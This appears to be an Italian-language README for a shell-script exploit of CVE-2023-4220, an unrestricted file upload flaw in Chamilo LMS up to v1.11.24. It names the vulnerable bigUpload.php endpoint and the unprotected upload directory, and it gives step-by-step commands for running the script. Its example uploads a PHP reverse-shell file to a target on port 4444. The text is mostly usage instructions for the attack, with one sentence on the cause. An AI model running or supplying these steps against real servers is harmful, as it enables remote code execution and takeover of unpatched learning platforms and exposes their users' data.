
Questo exploit dimostra una vulnerabilità di caricamento file senza restrizioni in Chamilo-LMS. La vulnerabilità interessa la funzionalità di caricamento di file di grandi dimensioni situata in:
/main/inc/lib/javascript/bigupload/inc/bigUpload.php
Versioni interessate: Chamilo LMS <= v1.11.24
La vulnerabilità consente il caricamento di file arbitrari in:
/main/inc/lib/javascript/bigupload/files/
Per prima cosa, rendi eseguibile l'exploit e visualizza le informazioni di utilizzo:
chmod +x CVE-2023-4220.sh
./CVE-2023-4220.sh
Esegui l'exploit con i parametri richiesti:
./CVE-2023-4220.sh -f reverse_file -h host_link -p port_in_the_reverse_file
Verifica il file caricato in:
http://target.test/main/inc/lib/javascript/bigupload/files/
-f: Specifica il file da caricare-h: URL dell'host di destinazione-p: Numero della porta per la connessione./CVE-2023-4220.sh -f shell.php -h http://target.test -p 4444
La vulnerabilità risiede nel meccanismo di caricamento file di Chamilo LMS, che non valida correttamente i file caricati nella funzionalità di caricamento di file di grandi dimensioni.
/main/inc/lib/javascript/bigupload/inc/bigUpload.php
/main/inc/lib/javascript/bigupload/files/